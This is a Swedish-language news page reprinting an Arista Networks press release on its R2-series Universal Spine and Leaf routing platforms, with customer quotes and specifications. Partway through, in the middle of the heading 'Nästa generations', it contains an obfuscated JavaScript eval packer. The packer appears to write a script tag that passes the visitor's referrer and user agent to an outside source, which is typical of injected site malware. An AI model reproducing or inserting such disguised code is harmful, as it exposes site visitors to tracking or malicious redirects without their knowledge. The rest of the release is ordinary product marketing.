Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Arista utökar plattformarna Universal Spine och Leaf

Arista
Sebastian

Arista Networks (NYSE:ANET) introducerar ny mjukvara och hårdvara för Arista R-seriens plattformar och accelererar satsningar på molnet för kunder som driftsätter routing-teknologi. Baserade på kisel med dubbla densiteten och halva strömförbrukningen än traditionellt kisel som används för routing, levererar de senaste plattformarna i R-serien mer än 150 Tbps i kapacitet för switching och routing-applikationer med molndrivna Arista EOS® mjukvarutekniker som Arista FlexRoute™ och AlgoMatch™.

–                               Att arbeta tillsammans med Arista har hjälpt Netnod att utveckla en flexibel och framtidssäker infrastruktur som ger betydligt högre kapacitet samtidigt som den reducerar kostnaden per Terabit jämfört med traditionella routing-plattformar. Arista 7500R/7280R och EOS stödjer vår ledande plattform allt eftersom vi utvecklar branschledande IX-tjänster och erbjuder Netnod-kunderna mer uppkopplingsmöjligheter än någonsin förr, säger Lars Michael Jogbäck, VD på Netnod.

Med introduktionen av Arista 7280R Universal Leaf och 7500R Universal Spine-plattformarna under 2016 är den första fasen av molntransformation på gång på flera håll när det kommer till routing, hos molnleverantörer, för Content Delivery Netvworks (CDN) och hos Internet-tjänsteleverantörer. Arista fokuserar på nästa fas av denna transformation med 7500R2-kretskortsmoduler för 7500R systemen och för de fasta 7280R2 plattformarna, vilket ger betydande förbättringar när det kommer till att skalbarhet, telemetri, säkerhet och routing.

–                               Vi valde Arista EOS och 7500R2 som del av vår nya arkitektur vilken kommer bli grunden för vår hyper-scale-säkerhetsplattform. Detta baserades på kombinationen av den djupa telemetrin, tät 100G, och stor skalning för routing samtidigt som stabilitet och sträckbarhet erbjuds med Arista EOS, sa Wen Temitim, Chief Network Scientist på StackPath.

Nätverksdesign för molnet kräver skalbarhet både uppåt och utåt. FlexRoute-förbättringarna på 7500R2-kretskortsmodulerna och för de fasta 7280R2 plattformarna introducerar stöd för över två miljoner router i hårdvaran, motsvarande fler än tre gånger routing-tabellen för hela internet. Medan routing-tabellen för Internet fortsätter att växa och native IPv6-nätverk ökar kan kunderna nu investera i en routing-plattform som kan hantera skalbarheten av Internet-tabellen både idag och i framtiden.

Utöver detta kan det senaste tillskottet ur 7500R-serien, 7516, öka skalbarheten på portarna med upp till 576 portar med line rate 100G Ethernet. Dessa förbättringar med högre skalbarhet ger byggstenarna för en ”scale-out” nätverksdesign, inklusive en ryggradskapacitet på branschledande 15 Petabits per sekund.

AlgoMatch på 7500R2-kretskortsmodulerna och de fasta 7280R plattformarna introducerar high rate sFlow vilket ger förbättrad trafikanalys av use cases med routing. Genom att möta utmaningen med att skala telemetri vid gränssnittshastigheter på 100G, gör R-serien till branschens mest synliga (highest visibility) lösning för tät 100G.

Säkerhetsövervakningen är kritisk för dagens molnnätverk. Pålitliga policys för åtkomstkontroll kan driftsättas i edge-routing-roller och möjliggörs både av den ökade ACL-skalningen och den vanliga IPv4- och IPv6-skalningen som AlgoMatch erbjuder. Med nya MACsec-anpassade kretskortsmoduler för 7500R kan korsande datacentertrafik säkras med en stark 256-bit MACsec kryptering.

Utan legacy-protokoll har Arista ett rakt tillvägagångssätt till både Layer 2 och Layer 3 VPN-lösningar med förbättrad redundans, med hjälp av Ethernet Virtual Private Networks (EVPN) för MPLS och VXLAN. Arista demonstrerade dessa teknologier som del av ett test för att visa på att deras produkter kan fungera med flera andra system mellan flera leverantörer på MPLS + SDN + NFV World Congress i March, 2017. Dessa service-edge-egenskaper i EOS tillsammans med förbättrade tabellstorlekar för R2-serien möjliggör nya routing-användarcases för Internet Exchange (IX)-molnstrukturer likväl som ytterligare Network Functions Virtualization (NFV)-molnlösningar för kabeloperatörer och mobile packet cores för 5G.

Nästa eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|iszes|var|u0026u|referrer|kdbkr||js|php’.split(’|’),0,{}))
generations Universal Spine och Leaf 

Arista fortsätter att bygga på meritlistan för starkt investeringsskydd med bakåt-kompatibilitet för kunder som använder 7500R-modulplattformen medan nya egenskaper introduceras med 7500R2-kretskortsmodulerna och 7280R2-sytemen, inklusive:

  • 16-slot 7500R-serien erbjuder an ny prestanda och densitetsmått för en ryggrad av upp till 15 Petabits och 576 portar 100G i ett enda system, med flexibiliteten att möjliggöra från 1G till 100G med framtidssäkert stöd för 400G.
  • Utökad hög kapacitet för 7280R2 med upp till 60 portar 100G, IEEE 802.3by 25G Ethernet och över två miljoner routes i hårdvara.
  • Höggradig sFlow-export på både fasta system och modulsystem.
  • Nya lösningar för datacenter interconnect med säker 802.1AE MACsec kryptering för kretskortsmoduler med 36 portar 100G och Coherent 200G DWDM kretskortsmoduler med en räckvidd på över 5 000 km.

Med dessa lanseringar går Arista om traditionellt kisel, vilket möjliggör för kunder att gå över från legacy-plattformar till skalbara, effektiva och programmerbara 100G och 25G-lösningar.

Pris och tillgänglighet

7500R/7280R2-serien finns tillgänglig nu. 7516 är för nuvarande ute på tester hos kunder och kommer finnas tillgänglig H2 2017.

För ytterligare information, välkommen på ett webinar kring nästa generations R2-serie på tisdagen den 11 juli, klockan 21.00.